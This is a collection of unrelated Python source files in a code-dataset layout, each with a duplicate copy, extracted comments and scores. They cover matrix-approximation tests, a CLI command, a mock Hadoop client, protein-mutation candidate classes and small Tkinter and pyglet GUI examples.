st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def test_plra1_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=1))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert 
l1 > l0 def test_plra_mask(simulate): x, eta = simulate mask = np.random.uniform(size=x.shape) < 0.25 x = np.ma.masked_array(x, mask=mask) res = wlra.plra(x, 3) @pytest.mark.skip('dummy test') def test_plra1_10x(): import scmodes x = scmodes.dataset.read_10x(f'/project2/mstephens/aksarkar/projects/singlecell-ideas/data/10xgenomics/b_cells/filtered_matrices_mex/hg19/', return_df=True) res = wlra.plra(x.values, rank=10, verbose=True)
import numpy as np import os import pickle import pytest import scipy.stats as st import wlra from fixtures import * # This is needed to get functions not publicly exported from wlra.wlra import lra from wlra.nmf import nmf def test_lra_shape(): x = np.zeros((100, 200)) res = lra(x, rank=1) assert res.shape == (100, 200) def test_lra_value(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = lra(x, rank=1) u, d, vt = np.linalg.svd(x, full_matrices=False) res0 = u[:,:1].dot(vt[:1]) * d[0] # Important: numpy/scipy give differences which can differ considerably for # individual elements. Instead, check that the objective values are close assert np.isclose(np.linalg.norm(x - res), np.linalg.norm(x - res0), atol=0.1) def test_wlra_shape(): x = np.zeros((100, 200)) w = np.ones((100, 200)) res = wlra.wlra(x, w, rank=1) assert res.shape == (100, 200) def test_wlra_unit_weight(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=1) res0 = lra(x, rank=1) assert np.isclose(res, res0).all() def test_wlra_rank_2(): np.random.seed(0) x = np.random.normal(size=(100, 200)) res = wlra.wlra(x, w=1, rank=2) res0 = lra(x, rank=2) assert np.isclose(res, res0).all() def test_wlra_missing(simulate): x, eta = simulate w = (np.random.uniform(size=x.shape) < 0.1).astype(float) wlra.wlra(x, w, rank=3) def test_plra_shape(): x = np.ones((100, 200)) res = wlra.plra(x, 1) assert res.shape == (100, 200) def test_plra_assume_rank_1(): x = np.random.poisson(lam=np.exp(np.random.normal(size=(100, 200)))) res = wlra.plra(x, 1) def test_plra_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=100, check_converged=True))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def test_plra1_oracle(simulate): x, eta = simulate l1 = st.poisson(mu=np.exp(wlra.plra(x, rank=3, max_outer_iters=1))).logpmf(x).sum() l0 = st.poisson(mu=np.exp(eta)).logpmf(x).sum() assert l1 > l0 def 
test_plra_mask(simulate): x, eta = simulate mask = np.random.uniform(size=x.shape) < 0.25 x = np.ma.masked_array(x, mask=mask) res = wlra.plra(x, 3) @pytest.mark.skip('dummy test') def test_plra1_10x(): import scmodes x = scmodes.dataset.read_10x(f'/project2/mstephens/aksarkar/projects/singlecell-ideas/data/10xgenomics/b_cells/filtered_matrices_mex/hg19/', return_df=True) res = wlra.plra(x.values, rank=10, verbose=True)
en
0.883703
# This is needed to get functions not publicly exported # Important: numpy/scipy give differences which can differ considerably for # individual elements. Instead, check that the objective values are close
1.886703
2
askoclics/cli/commands/file/describe.py
mboudet/askoclics
0
6618589
import click from askoclics.cli.cli import pass_context, json_loads from askoclics.cli.decorators import custom_exception, list_output @click.command('describe') @click.argument("files", type=str) @pass_context @custom_exception @list_output def cli(ctx, files): """Show file information Output: List of files containing info """ return ctx.gi.file.describe(files)
import click from askoclics.cli.cli import pass_context, json_loads from askoclics.cli.decorators import custom_exception, list_output @click.command('describe') @click.argument("files", type=str) @pass_context @custom_exception @list_output def cli(ctx, files): """Show file information Output: List of files containing info """ return ctx.gi.file.describe(files)
en
0.726722
Show file information Output: List of files containing info
2.043722
2
bigflow_python/python/bigflow/test/mock_hadoop_client.py
advancedxy/bigflow_python
1,236
6618590
<gh_stars>1000+ # Copyright (c) 2017 Baidu, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/env python """ mock hadoop client module """ import json import argparse import json import os import sys import uuid class HadoopCmd(object): """ Hadoop Cmd """ def __init__(self, args): parser = argparse.ArgumentParser('hadoop') parser.add_argument('-conf', action='append') parser.add_argument('-jobconf', dest='jobconf', action='append') parser.add_argument('-D', dest='jobconf', action='append') parser.add_argument('-get', dest='fs_op', action='store_const', const='get') parser.add_argument('-put', dest='fs_op', action='store_const', const='put') parser.add_argument('-du', dest='fs_op', action='store_const', const='du') parser.add_argument('-status', dest='counter_op', action='store_const', const='status') parser.add_argument('-rmr', dest='fs_op', action='store_const', const='rmr') parser.add_argument('-touchz', dest='fs_op', action='store_const', const='touchz') parser.add_argument('-test', dest='fs_op', action='store_const', const='test') parser.add_argument('-e', action='store_true') parser.add_argument('-cacheArchive', dest='cache_archive', action='append') parser.add_argument('-cacheFile', dest='cache_file', action='append') parser.add_argument('-mapdebug', nargs='?') parser.add_argument('-reducedebug', nargs='?') parser.add_argument('-input', nargs='?') parser.add_argument('-output', nargs='?') parser.add_argument('-vertex', nargs='?') 
parser.add_argument('-file', action='append') parser.add_argument('remain', nargs = argparse.REMAINDER) parsed = parser.parse_args(args[1:]) self.type = args[0] self.fs_op = parsed.fs_op if parsed.jobconf is None: parsed.jobconf = [] self.jobconf = dict(s.split('=') for s in parsed.jobconf) self.cache_archive = parsed.cache_archive self.cache_file = parsed.cache_file self.remain = parsed.remain self.file = parsed.file def vertex_num(self): """ get vertex num """ return int(self.jobconf['abaci.dag.vertex.num']) def vertex_memory(self, num, dft=None): """ get vertex memory """ ret = self.jobconf.get('hadoop.hce.memory.limit.%d' % num, None) if ret is None: return dft else: return int(ret) def vertex_concurrency(self, num, dft=None): """ get vertex concurrency """ ret = self.jobconf.get('mapred.reduce.tasks.%d' % num, None) ret = self.jobconf.get('mapred.map.tasks.%d' % num, ret) if ret is None: return dft else: return int(ret) def __str__(self): return str(self.__dict__) import os tmp_path = os.path.dirname(os.path.abspath(__file__)) + '/bigflow-hadoop-cmds' class MockHadoopClient(object): """ MockHadoopClient """ def __init__(self): self._uuid = str(uuid.uuid4()) self.hadoop_cmd_file = tmp_path + "." 
+ self._uuid abs_dir = os.path.dirname(os.path.abspath(__file__)) self.mock_hadoop_client_path = os.path.join(abs_dir, "mock_hadoop_client.py_" + self._uuid) # os.path.abspath(__file__) could be mock_hadoop_client.pyc os.link(os.path.join(abs_dir, "mock_hadoop_client.py"), self.mock_hadoop_client_path) def reset(self): if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def __del__(self): if os.path.exists(self.mock_hadoop_client_path): os.unlink(self.mock_hadoop_client_path) if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def recent_cmds(self, fn=None): """ get all cmds """ if fn is None: fn = lambda arg: True args = map(json.loads, file(self.hadoop_cmd_file)) args = [HadoopCmd(arg) for arg in args] return filter(fn, args) def recent_fs_cmds(self): """ get recent fs cmds """ return self.recent_cmds(lambda arg: arg.type == 'fs') def recent_job_cmds(self): """ get recent job cmds """ return self.recent_cmds(lambda arg: arg.type == 'hce') if __name__ == "__main__": hadoop_cmd_file = tmp_path mock_client_name = "mock_hadoop_client.py" client_pos = sys.argv[0].find(mock_client_name) if client_pos >= 0 and len(sys.argv[0][client_pos + len(mock_client_name):]): _uuid = sys.argv[0][client_pos + len(mock_client_name) + 1:] hadoop_cmd_file = hadoop_cmd_file + "." + _uuid ofile = open(hadoop_cmd_file, 'a+') print >> ofile, json.dumps(sys.argv[1:])
# Copyright (c) 2017 Baidu, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/env python """ mock hadoop client module """ import json import argparse import json import os import sys import uuid class HadoopCmd(object): """ Hadoop Cmd """ def __init__(self, args): parser = argparse.ArgumentParser('hadoop') parser.add_argument('-conf', action='append') parser.add_argument('-jobconf', dest='jobconf', action='append') parser.add_argument('-D', dest='jobconf', action='append') parser.add_argument('-get', dest='fs_op', action='store_const', const='get') parser.add_argument('-put', dest='fs_op', action='store_const', const='put') parser.add_argument('-du', dest='fs_op', action='store_const', const='du') parser.add_argument('-status', dest='counter_op', action='store_const', const='status') parser.add_argument('-rmr', dest='fs_op', action='store_const', const='rmr') parser.add_argument('-touchz', dest='fs_op', action='store_const', const='touchz') parser.add_argument('-test', dest='fs_op', action='store_const', const='test') parser.add_argument('-e', action='store_true') parser.add_argument('-cacheArchive', dest='cache_archive', action='append') parser.add_argument('-cacheFile', dest='cache_file', action='append') parser.add_argument('-mapdebug', nargs='?') parser.add_argument('-reducedebug', nargs='?') parser.add_argument('-input', nargs='?') parser.add_argument('-output', nargs='?') parser.add_argument('-vertex', nargs='?') parser.add_argument('-file', 
action='append') parser.add_argument('remain', nargs = argparse.REMAINDER) parsed = parser.parse_args(args[1:]) self.type = args[0] self.fs_op = parsed.fs_op if parsed.jobconf is None: parsed.jobconf = [] self.jobconf = dict(s.split('=') for s in parsed.jobconf) self.cache_archive = parsed.cache_archive self.cache_file = parsed.cache_file self.remain = parsed.remain self.file = parsed.file def vertex_num(self): """ get vertex num """ return int(self.jobconf['abaci.dag.vertex.num']) def vertex_memory(self, num, dft=None): """ get vertex memory """ ret = self.jobconf.get('hadoop.hce.memory.limit.%d' % num, None) if ret is None: return dft else: return int(ret) def vertex_concurrency(self, num, dft=None): """ get vertex concurrency """ ret = self.jobconf.get('mapred.reduce.tasks.%d' % num, None) ret = self.jobconf.get('mapred.map.tasks.%d' % num, ret) if ret is None: return dft else: return int(ret) def __str__(self): return str(self.__dict__) import os tmp_path = os.path.dirname(os.path.abspath(__file__)) + '/bigflow-hadoop-cmds' class MockHadoopClient(object): """ MockHadoopClient """ def __init__(self): self._uuid = str(uuid.uuid4()) self.hadoop_cmd_file = tmp_path + "." 
+ self._uuid abs_dir = os.path.dirname(os.path.abspath(__file__)) self.mock_hadoop_client_path = os.path.join(abs_dir, "mock_hadoop_client.py_" + self._uuid) # os.path.abspath(__file__) could be mock_hadoop_client.pyc os.link(os.path.join(abs_dir, "mock_hadoop_client.py"), self.mock_hadoop_client_path) def reset(self): if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def __del__(self): if os.path.exists(self.mock_hadoop_client_path): os.unlink(self.mock_hadoop_client_path) if os.path.isfile(self.hadoop_cmd_file): os.remove(self.hadoop_cmd_file) def recent_cmds(self, fn=None): """ get all cmds """ if fn is None: fn = lambda arg: True args = map(json.loads, file(self.hadoop_cmd_file)) args = [HadoopCmd(arg) for arg in args] return filter(fn, args) def recent_fs_cmds(self): """ get recent fs cmds """ return self.recent_cmds(lambda arg: arg.type == 'fs') def recent_job_cmds(self): """ get recent job cmds """ return self.recent_cmds(lambda arg: arg.type == 'hce') if __name__ == "__main__": hadoop_cmd_file = tmp_path mock_client_name = "mock_hadoop_client.py" client_pos = sys.argv[0].find(mock_client_name) if client_pos >= 0 and len(sys.argv[0][client_pos + len(mock_client_name):]): _uuid = sys.argv[0][client_pos + len(mock_client_name) + 1:] hadoop_cmd_file = hadoop_cmd_file + "." + _uuid ofile = open(hadoop_cmd_file, 'a+') print >> ofile, json.dumps(sys.argv[1:])
en
0.802014
# Copyright (c) 2017 Baidu, Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #!/bin/env python mock hadoop client module Hadoop Cmd get vertex num get vertex memory get vertex concurrency MockHadoopClient # os.path.abspath(__file__) could be mock_hadoop_client.pyc get all cmds get recent fs cmds get recent job cmds
2.044075
2
i18nize/utils.py
iktw/i18nize
0
6618591
def green_string(s): return "\033[1;32;40m{}\033[0m".format(s) def red_color(s): return "\033[1;31;40m{}\033[0m".format(s)
def green_string(s): return "\033[1;32;40m{}\033[0m".format(s) def red_color(s): return "\033[1;31;40m{}\033[0m".format(s)
none
1
2.324603
2
lambo/candidate.py
samuelstanton/lambo
10
6618592
<filename>lambo/candidate.py<gh_stars>1-10 import copy import uuid from Bio import PDB from pathlib import Path from lambo.tasks.proxy_rfp.foldx import FoldxManager from lambo.tasks.proxy_rfp.sasa import SurfaceArea from Bio.SeqUtils import seq1 from lambo.utils import StringSubstitution, StringDeletion, StringInsertion, FoldxMutation def apply_mutation(base_seq, mut_pos, mut_res, tokenizer): tokens = tokenizer.decode(tokenizer.encode(base_seq)).split(" ")[1:-1] mut_seq = "".join(tokens[:mut_pos] + [mut_res] + tokens[(mut_pos + 1):]) return mut_seq def pdb_to_residues(pdb_path, chain_id='A'): """ :param pdb_path: path to pdb file (str or Path) :param chain_id: (str) :return: residues: (Bio.Seq) :return: idxs: (list) residue indexes in the PDB """ parser = PDB.PDBParser() pdb_path = Path(pdb_path).expanduser() struct = parser.get_structure(pdb_path.stem, pdb_path) chain_residues = { chain.get_id(): seq1(''.join(x.resname for x in chain)) for chain in struct.get_chains() } chain_idxs = { chain.get_id(): [x.get_id()[1] for x in chain] for chain in struct.get_chains() } residues = chain_residues[chain_id] idxs = chain_idxs[chain_id] return residues, idxs class StringCandidate: def __init__(self, wild_seq, mutation_list, tokenizer, wild_name=None, dist_from_wild=0.): self.wild_residue_seq = wild_seq self.uuid = uuid.uuid4().hex self.wild_name = 'unnamed' if wild_name is None else wild_name self.mutant_residue_seq = self.apply_mutations(mutation_list, tokenizer) self.dist_from_wild = dist_from_wild self.tokenizer = tokenizer def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def apply_mutations(self, mutation_list, tokenizer): if len(mutation_list) == 0: return self.wild_residue_seq mutant_seq = copy.deepcopy(self.wild_residue_seq) mutant_seq = tokenizer.encode(mutant_seq)[1:-1] for mutation_op in mutation_list: old_tok_idx = mutation_op.old_token_idx mut_pos = mutation_op.token_pos if mut_pos < len(mutant_seq): assert 
old_tok_idx == mutant_seq[mut_pos], str(mutation_op) if isinstance(mutation_op, StringSubstitution): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringDeletion): mutant_seq = mutant_seq[:mut_pos] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringInsertion): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos:] else: raise RuntimeError('unrecognized mutation op') mutant_seq = tokenizer.decode(mutant_seq).replace(" ", "") return mutant_seq def new_candidate(self, mutation_list, tokenizer): cand_kwargs = dict( wild_seq=self.mutant_residue_seq, mutation_list=mutation_list, tokenizer=tokenizer, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_list), ) return StringCandidate(**cand_kwargs) class FoldedCandidate: def __init__(self, work_dir, wild_pdb_path, mutation_list, tokenizer, skip_minimization=True, chain='A', wild_name=None, dist_from_wild=0.): """ :param work_dir: (str or Path) output directory :param wild_pdb_path: (str or Path) path to pdb file (recommended to use FoldX repaired PDBs) :param mutation_list: list of Mutation named tuples :param skip_minimization: (bool) set to False to repair the wild PDB """ self.work_dir = work_dir self.uuid = uuid.uuid4().hex self.mutation_list = mutation_list self.tokenizer = tokenizer self.chain = chain self.wild_name = 'unnamed' if wild_name is None else wild_name self.dist_from_wild = dist_from_wild foldx_manager = FoldxManager(wt_pdb=wild_pdb_path, work_dir=work_dir, skip_minimization=skip_minimization) # pass dummy mutation to foldx_manager if mutation_list is empty if len(mutation_list) == 0: wild_seq, wild_idxs = pdb_to_residues(wild_pdb_path, self.chain) tokens = tokenizer.encode(wild_seq)[1:-1] mutation_list = [ # FoldxMutation(wild_seq[0], self.chain, wild_idxs[0], wild_seq[0]) FoldxMutation(tokens[0], chain, 
wild_idxs[0], tokens[0], tokenizer) ] foldx_success = True try: metrics = foldx_manager(mutation_list, self.uuid) self.wild_pdb_path = Path(work_dir) / self.uuid / 'WT_wt_input_Repair_1.pdb' self.mutant_pdb_path = Path(work_dir) / self.uuid / 'wt_input_Repair_1.pdb' except RuntimeError: print(f'{wild_name}, {mutation_list}') foldx_success = False self.wild_pdb_path = wild_pdb_path self.mutant_pdb_path = None # predicted stability self.wild_total_energy = metrics['wild_total_energy'] if foldx_success else float('inf') self.mutant_total_energy = metrics['mutant_total_energy'] if foldx_success else float('inf') # solvent-accessible surface area sasa_fn = SurfaceArea() self.wild_surface_area = sasa_fn(self.uuid, self.wild_pdb_path) self.mutant_surface_area = sasa_fn(self.uuid, self.mutant_pdb_path) if foldx_success else -float('inf') # residue sequences self.wild_residue_seq, self.wild_residue_idxs = pdb_to_residues( self.wild_pdb_path, self.chain ) self.mutant_residue_seq, self.mutant_residue_idxs = pdb_to_residues( self.mutant_pdb_path, self.chain ) if foldx_success else (None, None) def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def new_mutation(self, seq_idx, mutant_residue, mutation_type='sub'): """ formats the desired sequence substitution into a compatible FoldX mutation object :param seq_idx: position in the residue sequence :param mutant_residue: residue to be substituted :return: Mutation """ assert mutation_type == 'sub', 'Foldx only allows substitutions' seq_idx = seq_idx % len(self.mutant_residue_seq) # make indexes wrap around mutation_kwargs = dict( old_token_idx=self.tokenizer.encode(self.mutant_residue_seq[seq_idx])[1], chain=self.chain, token_pos=self.mutant_residue_idxs[seq_idx], new_token_idx=self.tokenizer.encode(mutant_residue)[1], tokenizer=self.tokenizer, ) return FoldxMutation(**mutation_kwargs) def new_candidate(self, mutation_list): """ Mutates the current mutant type into a new mutant type. 
Mutations should be formatted with `self.new_mutation` :param mutation_list: [Mutation objects] :return: MutationCandidate """ mutation_ops = [] for op in mutation_list: if isinstance(op, FoldxMutation): mutation_ops.append(op) elif isinstance(op, StringSubstitution): mutation_ops.append(self.new_mutation( op.token_pos, op.new_token, mutation_type='sub' )) else: raise ValueError cand_kwargs = dict( work_dir=self.work_dir, wild_pdb_path=self.mutant_pdb_path, mutation_list=mutation_ops, tokenizer=self.tokenizer, skip_minimization=True, chain=self.chain, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_ops), ) return FoldedCandidate(**cand_kwargs)
<filename>lambo/candidate.py<gh_stars>1-10 import copy import uuid from Bio import PDB from pathlib import Path from lambo.tasks.proxy_rfp.foldx import FoldxManager from lambo.tasks.proxy_rfp.sasa import SurfaceArea from Bio.SeqUtils import seq1 from lambo.utils import StringSubstitution, StringDeletion, StringInsertion, FoldxMutation def apply_mutation(base_seq, mut_pos, mut_res, tokenizer): tokens = tokenizer.decode(tokenizer.encode(base_seq)).split(" ")[1:-1] mut_seq = "".join(tokens[:mut_pos] + [mut_res] + tokens[(mut_pos + 1):]) return mut_seq def pdb_to_residues(pdb_path, chain_id='A'): """ :param pdb_path: path to pdb file (str or Path) :param chain_id: (str) :return: residues: (Bio.Seq) :return: idxs: (list) residue indexes in the PDB """ parser = PDB.PDBParser() pdb_path = Path(pdb_path).expanduser() struct = parser.get_structure(pdb_path.stem, pdb_path) chain_residues = { chain.get_id(): seq1(''.join(x.resname for x in chain)) for chain in struct.get_chains() } chain_idxs = { chain.get_id(): [x.get_id()[1] for x in chain] for chain in struct.get_chains() } residues = chain_residues[chain_id] idxs = chain_idxs[chain_id] return residues, idxs class StringCandidate: def __init__(self, wild_seq, mutation_list, tokenizer, wild_name=None, dist_from_wild=0.): self.wild_residue_seq = wild_seq self.uuid = uuid.uuid4().hex self.wild_name = 'unnamed' if wild_name is None else wild_name self.mutant_residue_seq = self.apply_mutations(mutation_list, tokenizer) self.dist_from_wild = dist_from_wild self.tokenizer = tokenizer def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def apply_mutations(self, mutation_list, tokenizer): if len(mutation_list) == 0: return self.wild_residue_seq mutant_seq = copy.deepcopy(self.wild_residue_seq) mutant_seq = tokenizer.encode(mutant_seq)[1:-1] for mutation_op in mutation_list: old_tok_idx = mutation_op.old_token_idx mut_pos = mutation_op.token_pos if mut_pos < len(mutant_seq): assert 
old_tok_idx == mutant_seq[mut_pos], str(mutation_op) if isinstance(mutation_op, StringSubstitution): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringDeletion): mutant_seq = mutant_seq[:mut_pos] + mutant_seq[mut_pos + 1:] elif isinstance(mutation_op, StringInsertion): new_tok_idx = mutation_op.new_token_idx mutant_seq = mutant_seq[:mut_pos] + [new_tok_idx] + mutant_seq[mut_pos:] else: raise RuntimeError('unrecognized mutation op') mutant_seq = tokenizer.decode(mutant_seq).replace(" ", "") return mutant_seq def new_candidate(self, mutation_list, tokenizer): cand_kwargs = dict( wild_seq=self.mutant_residue_seq, mutation_list=mutation_list, tokenizer=tokenizer, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_list), ) return StringCandidate(**cand_kwargs) class FoldedCandidate: def __init__(self, work_dir, wild_pdb_path, mutation_list, tokenizer, skip_minimization=True, chain='A', wild_name=None, dist_from_wild=0.): """ :param work_dir: (str or Path) output directory :param wild_pdb_path: (str or Path) path to pdb file (recommended to use FoldX repaired PDBs) :param mutation_list: list of Mutation named tuples :param skip_minimization: (bool) set to False to repair the wild PDB """ self.work_dir = work_dir self.uuid = uuid.uuid4().hex self.mutation_list = mutation_list self.tokenizer = tokenizer self.chain = chain self.wild_name = 'unnamed' if wild_name is None else wild_name self.dist_from_wild = dist_from_wild foldx_manager = FoldxManager(wt_pdb=wild_pdb_path, work_dir=work_dir, skip_minimization=skip_minimization) # pass dummy mutation to foldx_manager if mutation_list is empty if len(mutation_list) == 0: wild_seq, wild_idxs = pdb_to_residues(wild_pdb_path, self.chain) tokens = tokenizer.encode(wild_seq)[1:-1] mutation_list = [ # FoldxMutation(wild_seq[0], self.chain, wild_idxs[0], wild_seq[0]) FoldxMutation(tokens[0], chain, 
wild_idxs[0], tokens[0], tokenizer) ] foldx_success = True try: metrics = foldx_manager(mutation_list, self.uuid) self.wild_pdb_path = Path(work_dir) / self.uuid / 'WT_wt_input_Repair_1.pdb' self.mutant_pdb_path = Path(work_dir) / self.uuid / 'wt_input_Repair_1.pdb' except RuntimeError: print(f'{wild_name}, {mutation_list}') foldx_success = False self.wild_pdb_path = wild_pdb_path self.mutant_pdb_path = None # predicted stability self.wild_total_energy = metrics['wild_total_energy'] if foldx_success else float('inf') self.mutant_total_energy = metrics['mutant_total_energy'] if foldx_success else float('inf') # solvent-accessible surface area sasa_fn = SurfaceArea() self.wild_surface_area = sasa_fn(self.uuid, self.wild_pdb_path) self.mutant_surface_area = sasa_fn(self.uuid, self.mutant_pdb_path) if foldx_success else -float('inf') # residue sequences self.wild_residue_seq, self.wild_residue_idxs = pdb_to_residues( self.wild_pdb_path, self.chain ) self.mutant_residue_seq, self.mutant_residue_idxs = pdb_to_residues( self.mutant_pdb_path, self.chain ) if foldx_success else (None, None) def __len__(self): tok_idxs = self.tokenizer.encode(self.mutant_residue_seq) return len(tok_idxs) def new_mutation(self, seq_idx, mutant_residue, mutation_type='sub'): """ formats the desired sequence substitution into a compatible FoldX mutation object :param seq_idx: position in the residue sequence :param mutant_residue: residue to be substituted :return: Mutation """ assert mutation_type == 'sub', 'Foldx only allows substitutions' seq_idx = seq_idx % len(self.mutant_residue_seq) # make indexes wrap around mutation_kwargs = dict( old_token_idx=self.tokenizer.encode(self.mutant_residue_seq[seq_idx])[1], chain=self.chain, token_pos=self.mutant_residue_idxs[seq_idx], new_token_idx=self.tokenizer.encode(mutant_residue)[1], tokenizer=self.tokenizer, ) return FoldxMutation(**mutation_kwargs) def new_candidate(self, mutation_list): """ Mutates the current mutant type into a new mutant type. 
Mutations should be formatted with `self.new_mutation` :param mutation_list: [Mutation objects] :return: MutationCandidate """ mutation_ops = [] for op in mutation_list: if isinstance(op, FoldxMutation): mutation_ops.append(op) elif isinstance(op, StringSubstitution): mutation_ops.append(self.new_mutation( op.token_pos, op.new_token, mutation_type='sub' )) else: raise ValueError cand_kwargs = dict( work_dir=self.work_dir, wild_pdb_path=self.mutant_pdb_path, mutation_list=mutation_ops, tokenizer=self.tokenizer, skip_minimization=True, chain=self.chain, wild_name=self.wild_name, dist_from_wild=self.dist_from_wild + len(mutation_ops), ) return FoldedCandidate(**cand_kwargs)
en
0.696791
:param pdb_path: path to pdb file (str or Path) :param chain_id: (str) :return: residues: (Bio.Seq) :return: idxs: (list) residue indexes in the PDB :param work_dir: (str or Path) output directory :param wild_pdb_path: (str or Path) path to pdb file (recommended to use FoldX repaired PDBs) :param mutation_list: list of Mutation named tuples :param skip_minimization: (bool) set to False to repair the wild PDB # pass dummy mutation to foldx_manager if mutation_list is empty # FoldxMutation(wild_seq[0], self.chain, wild_idxs[0], wild_seq[0]) # predicted stability # solvent-accessible surface area # residue sequences formats the desired sequence substitution into a compatible FoldX mutation object :param seq_idx: position in the residue sequence :param mutant_residue: residue to be substituted :return: Mutation # make indexes wrap around Mutates the current mutant type into a new mutant type. Mutations should be formatted with `self.new_mutation` :param mutation_list: [Mutation objects] :return: MutationCandidate
2.157725
2
setup.py
WorldEditors/PaddleHelix
0
6618593
#!/usr/bin/env python # -*- coding: UTF-8 -*- ################################################################################ # # Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved # ################################################################################ """ Setup script. Authors: fangxiaomin01(<EMAIL>) Date: 2020/09/18 17:58:14 """ import setuptools setuptools.setup()
#!/usr/bin/env python # -*- coding: UTF-8 -*- ################################################################################ # # Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved # ################################################################################ """ Setup script. Authors: fangxiaomin01(<EMAIL>) Date: 2020/09/18 17:58:14 """ import setuptools setuptools.setup()
de
0.543317
#!/usr/bin/env python # -*- coding: UTF-8 -*- ################################################################################ # # Copyright (c) 2020 Baidu.com, Inc. All Rights Reserved # ################################################################################ Setup script. Authors: fangxiaomin01(<EMAIL>) Date: 2020/09/18 17:58:14
1.254675
1
_todo/programme/rawinput.py
sdpython/teachpyx
3
6618594
import Tkinter def question (legende) : reponse = [""] root = Tkinter.Tk () root.title ("pseudo raw_input") Tkinter.Label (text = legende).pack (side = Tkinter.LEFT) s = Tkinter.Entry (text= "def", width=80) s.pack (side = Tkinter.LEFT) def rget () : reponse [0] = s.get () root.destroy () Tkinter.Button (text = "ok", command = rget).pack (side = Tkinter.LEFT) root.mainloop () return reponse [0] print "reponse ", question ("texte de la question")
import Tkinter def question (legende) : reponse = [""] root = Tkinter.Tk () root.title ("pseudo raw_input") Tkinter.Label (text = legende).pack (side = Tkinter.LEFT) s = Tkinter.Entry (text= "def", width=80) s.pack (side = Tkinter.LEFT) def rget () : reponse [0] = s.get () root.destroy () Tkinter.Button (text = "ok", command = rget).pack (side = Tkinter.LEFT) root.mainloop () return reponse [0] print "reponse ", question ("texte de la question")
none
1
3.471815
3
examples/folding.py
LukeMS/pyglet-gui
52
6618595
<reponame>LukeMS/pyglet-gui from setup import * from pyglet_gui.manager import Manager from pyglet_gui.containers import VerticalContainer from pyglet_gui.document import Document from pyglet_gui.constants import ANCHOR_CENTER, HALIGN_LEFT from pyglet_gui.gui import SectionHeader, FoldingSection, Frame from pyglet_gui.scrollable import Scrollable from pyglet_gui.theme import Theme theme = Theme({"font": "Lucida Grande", "font_size": 12, "text_color": [255, 255, 255, 255], "gui_color": [255, 0, 0, 255], "section": { "right": { "image": { "source": "line.png", "region": [2, 0, 6, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "font_size": 14, "opened": { "image": { "source": "book-open.png" } }, "closed": { "image": { "source": "book.png" } }, "left": { "image": { "source": "line.png", "region": [0, 0, 6, 4], "frame": [2, 4, 4, 0], "padding": [0, 0, 0, 6] } }, "center": { "image": { "source": "line.png", "region": [2, 0, 4, 4], "frame": [0, 4, 4, 0], "padding": [0, 0, 0, 6] } } }, "frame": { "image": { "source": "panel.png", "frame": [8, 8, 16, 16], "padding": [16, 16, 8, 8] } } }, resources_path='../theme/') content = Frame( Scrollable( VerticalContainer([SectionHeader("Folding"), Document("Click on the section headers below to open them.", width=300), FoldingSection("Folding 1", Document("This is the first folding.", width=300)), FoldingSection("Folding 2", Document("This is the second folding.", width=300), is_open=False), FoldingSection("Folding 3", Document("This is the third folding.", width=300), is_open=False), ], align=HALIGN_LEFT), height=400) ) Manager( content , window=window, batch=batch, anchor=ANCHOR_CENTER, theme=theme) pyglet.app.run()
